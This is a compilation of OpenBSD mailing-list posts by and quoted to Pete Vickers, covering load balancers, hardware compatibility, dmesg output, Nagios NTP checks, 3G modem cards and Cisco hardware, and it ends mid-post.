I'm hoping this could be suplimented with a 1 or 2GB card in the  
integrated SDIO/MMC slot. Prehaps for development, remote booting is  
possible via either WLAN or USB conected ethernet ?


For interest, there are some addional hardware details and initial  
linux support for the device here:


http://wiki.xda-developers.com/index.php?pagename=UniversalResearch

http://wiki.xda-developers.com/index.php?pagename=UniversalProgress

Obviously in addition to willing developer(s), some hardware would be  
needed to hack on. I guess at least 2 of the devices would be needed,  
and they run at just under  $1000 USD each (including taxes, without  
discounts). I'm willing to stump up a significant proportion of one  
device if there is enough interest - both from developers and other  
potential users.


Comments ? (flame proof clothing donned)

/Pete

Re: HTTP Load balancer

[Pete Vickers]

On 7. jul. 2006, at 00.11, Clint Pachl wrote:


Richard Wilson wrote:

Hulloo list,
Can anyone recommend a load balancer for http/https for OpenBSD?
Currently I'm using Pound, from http://www.apsis.ch/pound/ which  
runs under OpenBSD, and supports connection tracking via IP,  
cookie and request ID (eg PHPSESSID) and seems to do everything I  
need.


pf: see pf(4) pf.conf(5) pfctl(8) pfsync(4)
It can balance using round-robin, random, and source-hash.  
Stickiness can be applied to the round-robin and random methods.  
The stickiness option and source-hash method will satisfy https,  
and http if you are not sharing session data among servers.


Best of all, pf is is built right in and simple as hell to use. All  
you need to do is config your existing firewall or put a pf box in  
front of your webservers. Hell, you could probably even run it on  
all of your webservers in a carp group (haven't done this, but  
seems feasible). Added bonus, pf inherently balances other  
services, not just http! Oh, another bonus, you can easily have  
automatic fail-over using pfsync and carp! I'm not sure you can  
beat the simplicity and robustness of pf.


As far as I'm concerned, pf obsoleted all load balancers for me. I  
used to use pen to balance http traffic. Because of pen's design,  
there were discrepancies in the web logs, where all connections,  
from the webservers POV, were coming from the pen load balancer. So  
there was an add on program, a hack, that was needed to later  
resolve web logs. It worked well, but what a mess. I would like to  
hear why people would not desire pf over some other load balancing  
option.


-pachl



pound can

1. operate ( route, alter, etc) on/at L7, e.g HTTP headers/URLs

2. do https<-->http forwarding, e.g SSL off-loading

3. log URLs with source/dest IP etc

none of these can be done via pf (unless i'm mistaken)


/Pete

Re: need a machine for an itanium port

[Pete Vickers]

On 9 Jun 2007, at 6:22 PM, Diana Eichert wrote:


A big shout out to deanna@ for getting this up on undeadly.org.

Okay, y'all, with deanna@'s post of dlg@'s request on undeadly.org  
this is gathering steam.  So, keep your cards(Credit) and letters($  
EUR YEN) coming, so Santa can visit Aus. a little earlier than  
usual this year.


diana



I've just transfered another 100eu to the Belgium account for this too.

Is anybody scanning ebay for a suitable machine yet ?


/Pete

Re: Setting up a virtual hosting machine w. SSH/SFTP accounts - pitfalls/experiences?

[Pete Vickers]

For a handy pound port see:

http://folesvaert.no/pound/


/Pete


On 9 Jul 2007, at 4:59 PM, Richard Wilson wrote:

> Stuart Henderson wrote:
>> On 2007/07/08 15:30, Chris Cappuccio wrote:
>>> Stuart Henderson [EMAIL PROTECTED] wrote:
>>>> Or use different ports and proxy them based on host headers rather
>>>> than burning IP addresses (for some RIR you are expected not to use
>>>> IP addresses for non-SSL virtual web hosting).
>>>>
>>>> I haven't checked, but hoststated should be able to do this.
>>> What software would you run on port 80 to break out the requests  
>>> to the
>>> various apache instances?  Squid with accelerator mode seems like  
>>> a massive
>>> beast to use for this purpose.  Any smaller apps?
>>
>> I thought you may already be able to use hoststated but I was  
>> mistaken.
>> The least intrusive way to add it there may be to provide a new  
>> action
>> that matches on the Host: header and allows the table name to be  
>> over-
>> ridden (obviously this is only any good with relay, not PF tables).
>>
>> Other than that, it looks like Apache mod_proxy (ProxyPass) can be
>> configured per-virtual-host so that should work.
>>
>> http://www.apsis.ch/pound/ is another option but I don't know how
>> well it works on OpenBSD. I think I've seen it run here, but I don't
>> know if it really works well.
>>
>> Varnish can probably do this too, but doesn't run here at all.
>> (It's a bit of an unusual app...)
>>
>
> I can vouch that Pound works very well on OpenBSD, and is very BSD- 
> like
> in its style and philosophy, the developers aiming of simple,  
> readable,
> provable code doing a specific job well.
>
> -- 
>
> Richard 'Dave' Wilson
> Systems Administrator
>
> Senokian Solutions Ltd.
> Business Innovation Centre,
> Binley Business Park, Coventry,
> United Kingdom
> CV3 2TX
> T: +44 (0)24 76 233 400
> DDI: +44 (0)24 76 233 416
> F: +44 (0)24 76 233 401
>



Pete Vickers

[EMAIL PROTECTED] |  +47 48 17 91 00

SystemNet AS

Re: Hmm...

[Pete Vickers]

Plenty on Ebay. If Josh's is not V2, then we can try & round up  
enough $$$ to grab one.

http://search.ebay.com/search/search.dll?_trksid=m37&satitle=WIC-1DSU- 
T1-V2


/Pete



On 25 Jul 2007, at 12:26 AM, Steve Fairhead wrote:

>>> To upgrade to a newer network setup, we kind of need a particular  
>>> piece
> of equipment:
>
> Cisco T1 DSU/CSU WAN Interface Card (WIC-1DSU-T1-V2)
>
> http://www.cisco.com/en/US/products/hw/routers/ps221/ 
> products_data_sheet0918
> 6a00801a9184.html
>
> It has to be the V2 model.
>
> If someone can get one to me, that would be great.
> <<
>
> I'm happy to put e.g. $50 towards it, if money can get you one.
>
> Steve
> http://www.fivetrees.com

Re: scanner??

[Pete Vickers]

Just to chime in my experiences, I have an old HP scanner/copier  
connected via a parallel cable to a HP jetdirect box.


From my openbsd host I simply run the following to retrieve an image  
of current page on the scanner glass.


wget -S -v -t 1 -O scan.pdf "http://jetdirect:9280/scan/scan.pdf? 
scan_id=1&image_format=3&paper_size=2&image_type=1&dpi=150&gamma=1"


I regard this as the scanning equivalent of Bob's 'get a PS printer'  
to avoid the complexities of drivers...



/Pete




On 11 Sep 2007, at 4:52 PM, Bob Beck wrote:


Interesting, because I'm seeking the same. Based on sane's site and
what was at the local staples, I bought a Canon Lide 25 - however the
sane support on openbsd didn't work, better yet, if I boot to windows
to see if the thing is boned or not, trying to install the windows
driver crashes (I get the demoplay.exe has crashed - do you wanna tell
microsoft?).

Needless to say I don't need the aggravation  - the canon is going
back to the store and based on the reccomendations here I'll look  
for an

epson.

-Bob


* Vim Visual <[EMAIL PROTECTED]> [2007-09-10 04:22]:
I forgot to mention... ahem... I want to use it with OpenBSD, of  
course...


(just in case of)

Pau

2007/9/10, Vim Visual <[EMAIL PROTECTED]>:

Hi,

Yet almost an amateur, I have totally moved to OpenBSD, I have
preordered my CDs, I bought them in the last release, tshirt/s  
too and
I am a missionary of the Unique Truth and try to convert all  
salvages

around me to it.

Now, I am looking forward to buying a scanner. I don't want a  
scanner,

printer, washing machine and vacuum cleaner, I just want a scanner
that scans documents and pictures. That's it.

... and I wonder whether any of you has a recommendation for me.

Do you?

Thanks a lot,

Pau Amaro Seoane




--
#!/usr/bin/perl
if ((not 0 && not 1) !=  (! 0 && ! 1)) {
   print "Larry and Tom must smoke some really primo stuff...\n";
}

Re: Network Slowness Proliant DL380 G4

[Pete Vickers]

OpenBSD's bge driver sucks big time, typical symptoms are very slow  
transfers, and incrementing errors (netstat -i).

You can confirm this by booting $other_os_boot_cd and retesting.

/Pete


On 6 Feb 2008, at 6:33 PM, Mark Parsons wrote:


Greetings,

It appears that I am having some major slowness issues on a HP
Proliant DL380G4 after a fresh install of OpenBSD 4.2 i386 single
processor kernel

When running a iperf (http://dast.nlanr.net/Projects/Iperf/) test to a
Linux host on the same physical subnet on the same physical switch we
are seeing around 4Mb/sec on a Gigabit broadcom card. After changing
the net.inet.tcp.sendspace and net.inet.tcp.sendspace to 262144 and
running iperf again we see the speeds jump up to around 72Mb/sec which
still seems slow since linux hosts on the same subnet are getting
around 757Mb/sec on similar cards and hardware.  I checked and my
net.inet.ip.ifq.maxlen is set to 256

Should I be running a different test then iperf?
Any thoughts on why I am seeing such low numbers for a Gigabit card?
Any suggestions for system changes I should make?
Any help is very much appreciated.

The outputs of the iperf tests and dmesg are below.

# /root/iperf-2.0.2/src/iperf -c 192.168.129.86 -d

Server listening on TCP port 5001
TCP window size: 16.0 KByte (default)
Client connecting to 192.168.129.86, TCP port 5001
TCP window size: 16.0 KByte (default)

[  6] local 192.168.129.86 port 35490 connected with 156.40.133.188  
port 5001
[  7] local 192.168.129.86 port 5001 connected with 156.40.133.188  
port 52430

[  6]  0.0-10.0 sec  5.12 MBytes  4.29 Mbits/sec
[  7]  0.0-10.1 sec  5.54 MBytes  4.61 Mbits/sec
# sysctl -w net.inet.tcp.sendspace=262144
net.inet.tcp.sendspace: 16384 -> 262144
# sysctl -w net.inet.tcp.recvspace=262144
net.inet.tcp.recvspace: 16384 -> 262144
# /root/iperf-2.0.2/src/iperf -c 192.168.129.86 -d

Server listening on TCP port 5001
TCP window size:   256 KByte (default)
Client connecting to 192.168.129.86, TCP port 5001
TCP window size:   256 KByte (default)

[  6] local 192.168.129.86 port 45594 connected with 156.40.133.188  
port 5001
[  7] local 192.168.129.86 port 5001 connected with 156.40.133.188  
port 50890

[  6]  0.0-10.0 sec  86.0 MBytes  72.0 Mbits/sec
[  7]  0.0-10.0 sec  85.0 MBytes  71.1 Mbits/sec


Dmesg: OpenBSD 4.2 (GENERIC) #375: Tue Aug 28 10:38:44 MDT 2007
[EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC
cpu0: Intel(R) Xeon(TM) CPU 3.60GHz ("GenuineIntel" 686-class) 3.61  
GHz
cpu0:  
FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE3 
6,CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,SSE3,MWAIT,DS- 
CPL,EST,TM2,CNXT-ID,CX16,xTPR

real mem  = 3757613056 (3583MB)
avail mem = 3650039808 (3480MB)
mainbus0 at root
bios0 at mainbus0: AT/286+ BIOS, date 12/31/99, BIOS32 rev. 0 @
0xf, SMBIOS rev. 2.3 @ 0xec000 (58 entries)
bios0: vendor HP version "P51" date 08/26/2004
bios0: HP ProLiant DL380 G4
pcibios0 at bios0: rev 2.1 @ 0xf/0x2000
pcibios0: PCI BIOS has 7 Interrupt Routing table entries
pcibios0: PCI Interrupt Router at 000:31:0 ("Intel 82801EB/ER LPC"  
rev 0x00)

pcibios0: PCI bus #10 is the last bus
bios0: ROM list: 0xc/0x8000 0xc8000/0x4000! 0xee000/0x2000!
acpi at mainbus0 not configured
cpu0 at mainbus0
cpu0: Enhanced SpeedStep disabled by BIOS
pci0 at mainbus0 bus 0: configuration mode 1 (no bios)
pchb0 at pci0 dev 0 function 0 "Intel E7520 MCH" rev 0x0a
ppb0 at pci0 dev 2 function 0 "Intel MCH PCIE" rev 0x0a
pci1 at ppb0 bus 2
ppb1 at pci1 dev 0 function 0 "Intel PCIE-PCIE" rev 0x09
pci2 at ppb1 bus 3
bge0 at pci2 dev 1 function 0 "Broadcom BCM5704C" rev 0x10, BCM5704 B0
(0x2100): irq 5, address 00:0f:20:f7:52:f1
brgphy0 at bge0 phy 1: BCM5704 10/100/1000baseT PHY, rev. 0
bge1 at pci2 dev 1 function 1 "Broadcom BCM5704C" rev 0x10, BCM5704 B0
(0x2100): irq 5, address 00:0f:20:f7:52:f0
brgphy1 at bge1 phy 1: BCM5704 10/100/1000baseT PHY, rev. 0
ppb2 at pci1 dev 0 function 2 "Intel PCIE-PCIE" rev 0x09
pci3 at ppb2 bus 4
ciss0 at pci3 dev 3 function 0 "Compaq Smart Array 64xx" rev 0x01:  
irq 5

ciss0: 1 LD, HW rev 1, FW 2.26/2.26
scsibus0 at ciss0: 1 targets
sd0 at scsibus0 targ 0 lun 0:  SCSI0 0/ 
direct fixed
sd0: 173639MB, 22135 cyl, 255 head, 63 sec, 512 bytes/sec,  
355612800 sec total

ppb3 at pci0 dev 6 function 0 "Intel MCH PCIE" rev 0x0a
pci4 at ppb3 bus 5
ppb4 at pci4 dev 0 function 0 "Intel PCIE-PCIE" rev 0x09
pci5 at ppb4 bus 6
ppb5 at pci4 dev 0 function 2 "Intel PCIE-PCIE" rev 0x09
pci6 at ppb5 bus 10
uhci0 at pci0 dev 29 function 0 "Intel 82801EB/ER USB" rev 0x02: irq 5
uhci1 at pci0 dev 29 function

Re: zombies - solved

[Pete Vickers]

If you want to serve http content via IPv6, then perhaps you can run
httpd on your (IPv4) loopback interface, and have relayd listen on
your public IPv6 interface, and forward requests over IPv4 to it ?

/Pete


On 12 Mar 2008, at 4:22 PM, Lars Noodin wrote:


Theo de Raadt wrote:

apache2 is not free enough.


Ok. There were some additional reasons mentioned, but licensing is
enough on its own.  I found the old announcement now that I know
what to
look for:
http://archives.neohapsis.com/archives/openbsd/2004-06/0448.html

Apache 1.3.29 is decent enough and has the functionality, name brand
recognition and familiarity needed.  But without updates, it seems a
dead end and not a good idea for new activities.  I'm also not finding
reference to IPv6 in the documentation for Apache 1.3.x either
online or
in the man pages and that was my main reason for even looking at
Apache2.

A fork does not seem like a good return on investment, so v 1.3.29
will
probably go away sooner than later once the Apache Foundation drops
maintenance on the 1.3 series.

Gregg proposed, nginx ( http://nginx.net/ ), which seems to be just
getting started.  It's under a 'BSD-like' license.  It might work, but
seems new.

I see Lighttpd already in the 'packages' and it is under an
appropriate
license.  In the last year, it has gained a lot in both visibility and
user-base.  In a lot of cases, perhaps most, new setups could be
steered
towards Lighttpd, if it were mentioned in the documentation here and
there.  I probably would have chosen it over grabbing Apache2 from the
ports tree had it been mentioned.  Apache2 and Lighttpd both required
some adjustment and I would rather future-proof my activities, just in
case they have to be supported that long.

The mention of it can be small and does not need to affect how things
are currently done.  But as more use it, it will be easier later to
drop
Apache when (if) the time comes.

Would something like this be appropriate at the tail end of the httpd
man page for v 1.3.29?

 Due to licensing changes, the version of Apache shipped with
 OpenBSD will stay at version 1.3.29.  Bugfixes will be provided,
 but no further updates.  Alternatively, Lighttpd is available
 via OpenBSD's packages.


Regards,
-Lars

nagios monitoring of a remote openntp service

[Pete Vickers]

Hi,

Has anybody gotten Nagois' check_ntp_* to play nicely with a remote  
openntp service ? It appears to  rely upon services not implemented  
in openntp ?


/Pete

Re: nagios monitoring of a remote openntp service

[Pete Vickers]

Hi,

That's not the problem ! - the hosting is correctly listening, and  
indeed other hosts are correctly syncing to it. It's only the nagios  
check_ntp_* that doesn't like it.



$ ~> grep -i listen /etc/ntpd.conf
# Addresses to listen on (ntpd does not listen by default)
listen on *

$ ~> ps -aux | grep ntp
_ntp 18182  0.0  0.0   468   612 ??  S 19Nov065:57.94  
ntpd: ntp engine (ntpd)
root 10889  0.0  0.0   512   616 ??  Is19Nov060:00.24  
ntpd: [priv] (ntpd)




/Pete


On 8 May 2008, at 12:59 PM, Dave Ewart wrote:


On Thursday, 08.05.2008 at 11:53 +0200, Pete Vickers wrote:


Has anybody gotten Nagois' check_ntp_* to play nicely with a remote
openntp service ? It appears to  rely upon services not implemented
in openntp ?


openntpd does not listen on port 123 by default: that's what Nagios
would use to monitor,

Check man ntpd.conf for the 'listen' option.

Dave.

--
Dave Ewart [EMAIL PROTECTED], jabber:[EMAIL PROTECTED],  
freenode:davee

All email from me is now digitally signed, http://www.sungate.co.uk/
Fingerprint: AEC5 9360 0A35 7F66 66E9 82E4 9E10 6769 CD28 DA92

Re: nagios monitoring of a remote openntp service

[Pete Vickers]

that works fine:

$ ~>/usr/local/libexec/nagios/check_ntp_time  -H ntp1
NTP OK: Offset 0.0008395434124 secs|offset=0.000840s; 
60.00;120.00;


but, I'm trying to verifty the NTP server's health, not that my  
monitoring host is sync'd to it.


"Notes:
 This plugin checks the clock offset between the local host and a
 remote NTP server. It is independent of any commandline programs or
 external libraries.

 If you'd rather want to monitor an NTP server, please use
 check_ntp_peer."


but that doesn't work (for me) :

$ ~>/usr/local/libexec/nagios/check_ntp_peer -H ntp1 -t 3
CRITICAL - Socket timeout after 3 seconds



/Pete



On 8 May 2008, at 1:55 PM, Stuart Henderson wrote:


On 2008-05-08, Pete Vickers <[EMAIL PROTECTED]> wrote:

Has anybody gotten Nagois' check_ntp_* to play nicely with a remote
openntp service ? It appears to  rely upon services not implemented
in openntp ?


this is against an OpenNTP server;

<[EMAIL PROTECTED]:12>$ /usr/local/libexec/nagios/check_ntp_time -H ntp
NTP OK: Offset -0.002711469308 secs|offset=-0.002711s; 
60.00;120.00;


so, it can work.

eeepc acpi

[Pete Vickers]

Hi Matthieu,

Just a quick note concerning the eeepc i386-laptop.html entry. I  
acquired one today, and installed OpenBSD via pxeboot using the  
builtin ethernet interface. Then I discovered it's not entire acpi  
that causes panics, it's only acpibat. If you boot -c (or config -e)  
then:

- disable apm
- enable acpi
- disable acpibat

you'll get the following:

# sysctl hw
hw.machine=i386
hw.model=Intel(R) Celeron(R) M processor 900MHz ("GenuineIntel" 686- 
class)

hw.ncpu=1
hw.byteorder=1234
hw.pagesize=4096
hw.disknames=wd0,sd0
hw.diskcount=2
hw.sensors.acpitz0.temp0=54.05 degC (zone temperature)
hw.sensors.acpiac0.indicator0=On (power supply)
hw.cpuspeed=631
hw.setperf=100
hw.vendor=ASUSTeK Computer INC.
hw.product=701
hw.version=x.x
hw.serialno=EeePC-1234567890
hw.uuid=80480a3a-bf04-dd81-37b7-001fc65688ff
hw.physmem=527527936
hw.usermem=527523840
#

and

# apmd
# apm -A
# apm
Battery state: absent, 0% remaining, unknown life estimate
A/C adapter state: connected
Performance adjustment mode: auto (75 MHz)


Full dmesg below:


/Pete


OpenBSD 4.3-current (GENERIC) #853: Fri May  2 04:37:23 MDT 2008
[EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC
cpu0: Intel(R) Celeron(R) M processor 900MHz ("GenuineIntel" 686- 
class) 631 MHz
cpu0:  
FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,CFLUSH 
,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,TM,SBF

real mem  = 527527936 (503MB)
avail mem = 501972992 (478MB)
mainbus0 at root
bios0 at mainbus0: AT/286+ BIOS, date 03/03/08, BIOS32 rev. 0 @  
0xf0010, SMBIOS rev. 2.5 @ 0xf06e0 (37 entries)

bios0: vendor American Megatrends Inc. version "0910" date 03/03/2008
bios0: ASUSTeK Computer INC. 701
apm at bios0 function 0x15 not configured
acpi0 at bios0: rev 0
acpi0: tables DSDT FACP APIC OEMB MCFG
acpi0: wakeup devices P0P3(S0) P0P4(S0) P0P5(S0) P0P6(S0) P0P7(S0)  
MC97(S0) USB1(S0) USB2(S0) USB3(S0) USB4(S0) EUSB(S0)

acpitimer0 at acpi0: 3579545 Hz, 24 bits
acpiprt0 at acpi0: bus 0 (PCI0)
acpiprt1 at acpi0: bus 5 (P0P3)
acpiprt2 at acpi0: bus 3 (P0P5)
acpiprt3 at acpi0: bus 1 (P0P6)
acpiec0 at acpi0
acpicpu0 at acpi0: C3, C2
acpitz0 at acpi0: critical temperature 90 degC
acpibat at acpi0 not configured
acpiac0 at acpi0: AC unit online
acpiasus0 at acpi0
acpibtn0 at acpi0: LID_
acpibtn1 at acpi0: SLPB
acpibtn2 at acpi0: PWRB
bios0: ROM list: 0xc/0xf800!
cpu0 at mainbus0
pci0 at mainbus0 bus 0: configuration mode 1 (no bios)
pchb0 at pci0 dev 0 function 0 "Intel 82915GM Host" rev 0x04
vga1 at pci0 dev 2 function 0 "Intel 82915GM Video" rev 0x04
wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation)
wsdisplay0: screen 1-5 added (80x25, vt100 emulation)
agp0 at vga1: aperture at 0xd000, size 0x1000
"Intel 82915GM Video" rev 0x04 at pci0 dev 2 function 1 not configured
azalia0 at pci0 dev 27 function 0 "Intel 82801FB HD Audio" rev 0x04:  
irq 5

azalia0: codec[s]: Realtek/0x0662
audio0 at azalia0
ppb0 at pci0 dev 28 function 0 "Intel 82801FB PCIE" rev 0x04: irq 5
pci1 at ppb0 bus 4
ppb1 at pci0 dev 28 function 1 "Intel 82801FB PCIE" rev 0x04: irq 11
pci2 at ppb1 bus 3
lii0 at pci2 dev 0 function 0 "Attansic Technology L2" rev 0xa0: irq  
11, address 00:1f:c6:56:88:ff
ukphy0 at lii0 phy 1: Generic IEEE 802.3u media interface, rev. 2:  
OUI 0x001374, model 0x0002

ppb2 at pci0 dev 28 function 2 "Intel 82801FB PCIE" rev 0x04: irq 10
pci3 at ppb2 bus 1
uhci0 at pci0 dev 29 function 0 "Intel 82801FB USB" rev 0x04: irq 3
uhci1 at pci0 dev 29 function 1 "Intel 82801FB USB" rev 0x04: irq 7
uhci2 at pci0 dev 29 function 2 "Intel 82801FB USB" rev 0x04: irq 10
uhci3 at pci0 dev 29 function 3 "Intel 82801FB USB" rev 0x04: irq 5
ehci0 at pci0 dev 29 function 7 "Intel 82801FB USB" rev 0x04: irq 3
usb0 at ehci0: USB revision 2.0
uhub0 at usb0 "Intel EHCI root hub" rev 2.00/1.00 addr 1
ppb3 at pci0 dev 30 function 0 "Intel 82801BAM Hub-to-PCI" rev 0xd4
pci4 at ppb3 bus 5
ichpcib0 at pci0 dev 31 function 0 "Intel 82801FBM LPC" rev 0x04: PM  
disabled
pciide0 at pci0 dev 31 function 2 "Intel 82801FBM SATA" rev 0x04:  
DMA, channel 0 wired to compatibility, channel 1 wired to compatibility

wd0 at pciide0 channel 1 drive 0: 
wd0: 1-sector PIO, LBA, 3815MB, 7815024 sectors
wd0(pciide0:1:0): using PIO mode 4, Ultra-DMA mode 4
ichiic0 at pci0 dev 31 function 3 "Intel 82801FB SMBus" rev 0x04: irq 7
iic0 at ichiic0
spdmem0 at iic0 addr 0x50: 512MB DDR2 SDRAM non-parity PC2-5300CL5 SO- 
DIMM

usb1 at uhci0: USB revision 1.0
uhub1 at usb1 "Intel UHCI root hub" rev 1.00/1.00 addr 1
usb2 at uhci1: USB revision 1.0
uhub2 at usb2 "Intel UHCI root hub" rev 1.00/1.00 addr 1
usb3 at uhci2: USB revision 1.0
uhub3 at usb3 "Intel UHCI root hub" rev 1.00/1.00 addr 1
usb4 at uhci3: USB revision 1.0

Re: umsm(4) SprintPCS users -- Merlin PC720 anyone?

[Pete Vickers]

I don't know about Merlin PC720, but I recently got a Merlin XU870,  
and it works fine out of the box:



# cu -l /dev/cuaU0 -s 230400
Connected
ati3
Manufacturer: Novatel Wireless Incorporated
Model: Merlin XU870 ExpressCard
Revision: 9.2.00.0-00  [2006-08-03 13:07:27]
IMEI: xxx
+GCAP: +CGSM,+DS,+ES

OK



dmesg:

Mar 27 16:45:40 n800c /bsd: OpenBSD 4.1-beta (GENERIC) #1410: Sun Feb  
25 19:55:40 MST 2007

...
Mar 27 16:45:54 n800c /bsd: ohci2 at cardbus0 dev 0 function 0 "NEC  
USB" rev 0x43: irq 11, version 1.0

Mar 27 16:45:54 n800c /bsd: usb3 at ohci2: USB revision 1.0
Mar 27 16:45:54 n800c /bsd: uhub3 at usb3
Mar 27 16:45:54 n800c /bsd: uhub3: NEC OHCI root hub, rev 1.00/1.00,  
addr 1
Mar 27 16:45:54 n800c /bsd: uhub3: 3 ports with 3 removable, self  
powered
Mar 27 16:45:54 n800c /bsd: ohci3 at cardbus0 dev 0 function 1 "NEC  
USB" rev 0x43: irq 11, version 1.0

Mar 27 16:45:55 n800c /bsd: usb4 at ohci3: USB revision 1.0
Mar 27 16:45:55 n800c /bsd: uhub4 at usb4
Mar 27 16:45:55 n800c /bsd: uhub4: NEC OHCI root hub, rev 1.00/1.00,  
addr 1
Mar 27 16:45:55 n800c /bsd: uhub4: 2 ports with 2 removable, self  
powered

Mar 27 16:45:58 n800c /bsd: umsm0 at uhub3 port 1
Mar 27 16:45:58 n800c /bsd:
Mar 27 16:45:58 n800c /bsd: umsm0: Novatel Wireless Novatel Wireless  
HSDPA Modem, rev 1.10/0.00, addr 2

Mar 27 16:45:58 n800c /bsd: ucom0 at umsm0 portno 0



(although it drops into ddb if I eject it while running...)



regards / mvh,

Pete Vickers

[EMAIL PROTECTED] //  +47 48 17 91 00




On 27. mar. 2007, at 01.46, Jeff Quast wrote:


I've been happily using a umsm(4) sierra wireless aircard 580[1]. It
literally took less than 5 minutes to get this card moving in OpenBSD
with the ppp.conf example in umsm(4). Highly recommend this card, its
about $60 on ebay these days.

EVDO rev a was deployed to my area, and I was happy with the sierra
model (though not ecstatic over the latency), so I purchased a 'Sierra
wireless aircard 595' [2]. Somebody reported success in linux[3] with
this card, and umsm(4) listed this device as a maybe.

I forked out the $262, and Unfortunately this was not the 5-minute
success story as I had hoped for.

Although it attached to ucom0, if I used cu -l /dev/cuaU0 -s 230400, I
was not able to input an "at" (and receive "OK", such as on the 580).
I wondered if the 168Mhz laptop I was using it with was too old
(pcmcia type II? what? it fit...), so I built a fresh 1.2Ghz i386 and
used a pci<->pcmcia card with similar deadlock serial. This also
failed the same way on macppc.

There is a 30 day return limit on these, so I've re-activated the 580
(effectively disabling the new card) and returned this product. So my
question:

I am using sprintpcs as my provider. Can anybody report success with
the 'Merlin PC720' [4]?

1. http://www.sierrawireless.com/product/ac580.aspx
2. http://www.sierrawireless.com/product/ac595.aspx
3. http://www.pbandjelly.org/2006/12/sierra-wireless-aircard-595- 
configuration-sprintpcs/

4. http://www.novatelwireless.com/products/merlin/merlin-pc720.html

Thanks,
jdq

Re: Distributed File System

[Pete Vickers]

try web DAV  - works a treat for me on OpenBSD with linux, Mac &   
windows clients...


/pete


On 17 Apr 2007, at 2:28 AM, Rico Secada wrote:


Hi all.

At work I am experiencing with setting up some distributed file  
system, at the current moment working with NFS. The problem is that  
it is being setup at work and people, from their homes, need to be  
able to mount the system.


I have no prior experience in this, except for setting up and using  
NFS across a LAN.


I would greatly appreciate any recommendations regarding security,  
effectiveness and other advices!


I have been thinking about tunneling NFS over SSH2, and possibly  
using some kind of cache, but I do not know if this is actually the  
best approach. I have also been thinking about using AFS as posted  
before.


Also perhaps, but not necessary, support for Windows could be  
needed in the long run.


What are you guys using and how is it setup?

Best and kind regards!

Rico.

Re: running OpenBSD on switch hardware

[Pete Vickers]

Pete Vickers

[EMAIL PROTECTED] |  +47 48 17 91 00

Systemnet AS


On 20 Apr 2007, at 10:42 AM, Claudio Jeker wrote:


On Fri, Apr 20, 2007 at 09:48:44AM +0200, Toni Mueller wrote:

Hi Claudio,

On Fri, 06.04.2007 at 12:09:38 +0200, Claudio Jeker  
<[EMAIL PROTECTED]> wrote:
Even the most expensive Cisco/Foundry/Extreme switches have not  
the CPU

power to route or filter packets.


how comes they boast running BGP and such stuff? Eg. Cisco 6509  
and up,

or Extreme Black Diamond?  This requires real routing capabilities,
doesn't it?



Depends on your definition of routing capabilities. Layer 3 switches
(ab)use the CAM to do route lookups. For example the Cisco 7600  
switching

router is able to route/switch at high pps rates under normal (lab)
circumstances but they start to trash when your network is under a  
DDoS
attack. This comes from the fact that the CAM table is overflooded  
and so

many packets are redirected to the CPU for a slow routing lookup.
Most L3 switches have small CAM tables and so only small routing  
tables

can be handled efficently on those systems (small as in <20'000 routes
which is nothing compared to the 215'000 bgp prefixes seen on a full
view).
Also note that switching router do lookups in HW so any feature  
that is
not part of the HW engine needs help from the main CPU. Tunneling,  
IPsec,
statefull filtering, L2TP, MPLS VPN and so on are either not  
available or

are done fully in software.

L3 switches can be compared to running a system with 64M Ram and  
4GB of
swap. Paging and swapping makes the box comparable to one with 4GB  
of RAM

until your running processes start to use more than the 64M available.

--
:wq Claudio



Hi,

With SUP32/SUP720 and PFC2/3 this is much less a problem, as stated  
below. In fact, you can do a lot of config on the TCAM itself to  
mitigate DDoS associated problems:


http://www.cisco.com/en/US/products/hw/switches/ps708/ 
products_white_paper09186a00800c9470.shtml#wp43045


/Pete

RFC 3623 support in OSPFd

[Pete Vickers]

Hi,

I'm trying to use OSPFd in a 'high availability' environment, where  
it's next-hop h/a pair (mis)use RFC3623 (Graceful OSPF Restart) to  
provide rapid failover between nodes. However it appears OSPFd  
doesn't support this ?


Before I dig into this, can norby/claudio/henning cast any light on  
the subject ?



# uname -a
OpenBSD lab-netrax1.test 4.1 GENERIC#1099 sparc64


/Pete

Re: openbsd on cisco hardware?

[Pete Vickers]

most PIX boxes are i386 based. IIRC I've booted bsd.rd on them in the  
past, nothing special except flash boot.


pix515e# sh ver
...
Hardware:   PIX-515E, 64 MB RAM, CPU Pentium II 433 MHz
Flash E28F128J3 @ 0xfff0, 16MB
BIOS Flash AM29F400B @ 0xfffd8000, 32KB
...
0: Ext: Ethernet0   : address is 0012.00e1.cd67, irq 10
1: Ext: Ethernet1   : address is 0012.00e1.cd68, irq 11
2: Ext: Ethernet2   : address is 000e.0c59.bd1a, irq 11
...
Interface Ethernet0 "outside", is up, line protocol is up
  Hardware is i82559, BW 100 Mbps
Auto-Duplex(Full-duplex), Auto-Speed(100 Mbps)
...

they usually even come with a (non functioning under PIXOS) USB port  
too.



/Pete


On 13. nov. 2006, at 04.30, Jason George wrote:

i know this is likely not possible for a number of reasons but i  
figured i'd
ask: are there or have there been any plans to port openbsd to run  
on cisco

hardware?

googling for something like this is not very productive since the  
CARP vs. VRRP
and firewall interoperation links dominate searches with "cisco  
openbsd" in them.



Older Cisco routers will typically have a Motorola 68k or some MIPS- 
based
processor.  These devices will also usually have minimal RAM (1 to  
4M).  Not
exactly a great setup for a target platform...  I seem to recall  
that the
030-based Mot systems may have also be lacking in a proper MMU, but  
I could be

wrong.  I'm sure I'll be corrected by someone on the list.

Newer gear will have a MIPS or PowerPC processor in them.

x86 PIX boxes could conceivably be a target platform, but their  
lack of
storage would require a flashboot-style installation, and thus  
would not be
supported in an official manner, if even they were made to boot  
successfully.

The same would go for the non-x86 modern gear.

Frankly, Cisco's devices aren't even price-attractive, so as much  
as it would
be mildly interesting to run OpenBSD on some PIX 515 boxes, it's a  
waste of

time and money.

--Jason

Re: openbsd on cisco hardware?

[Pete Vickers]

Apples & oranges I believe, this *might* be why:

[EMAIL PROTECTED] ~/Desktop> file pix706.bin bsd.rd floppy40.fs

